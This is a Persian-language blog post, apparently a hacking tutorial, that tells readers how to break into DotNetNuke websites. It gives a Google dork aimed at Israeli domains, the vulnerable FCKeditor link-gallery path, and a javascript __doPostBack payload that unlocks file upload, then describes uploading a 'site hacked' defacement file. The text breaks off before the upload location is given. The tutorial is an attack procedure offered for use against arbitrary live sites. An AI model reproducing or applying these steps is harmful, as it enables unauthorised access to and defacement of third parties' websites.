آموزش هک کردن سایت ها

در این آموزش میخوام شما رو با یک روشی آشنا کنم که با هاش میتونین بیش از 10000000 تا سایت رو هک کنید .

اول از همه گوگل رو باز کنین و توش دورک زیر را تایپ کنین

Dork : inurl:"/portals/0" site:.il


منظور از
il که در انتهای Dork هست برای پیدا کردن سایت های اسرائیل می باشد و شما می توانید به .Com یا .Net یا .Org یا .ir و هر دامنه ی دیگه ای تغییر بدین.وقتی سایتها رو سرچ کردین و پیدا کردین به آخر سایت لینک زیر رو اضافه میکنید .
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx


مثلا :
www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

حالا اگر سایت ما آسیبپذیر باشه سه تا گزینه میده و ما سومی رو انتخاب میکنیم . (برای ارسال فایل) . حالا میبینید که فایلهای سایت رو نشون میده ولی ما نمیتونیم چیزی آپلود کنیم .برای این که ما چیزی آپلود کنیم باید لینک زیر رو به جای آدرس سایت بزنیم (تو آدرس بار)

javascript:__doPostBack('ctlURL$cmdUpload','')

خوب حالا میتونید فایل آپلود کنین ولی هر فایلی رو نه . مثلا نمیتونیم صفحه
html یا php
آپ کنیم . فایل هایی که آپلود می کنید باید دارای پسوند های زیر باشد:

swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp, *.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob


خوب شما میتونین در یک فایل متنی بنویسید که سایت هک شد و آپلود کنین و وقتی فایل آپلود شد محل قرار گرفتن فایل در شاخه ی زیر می باشد :


/ 0 نظر / 24 بازدید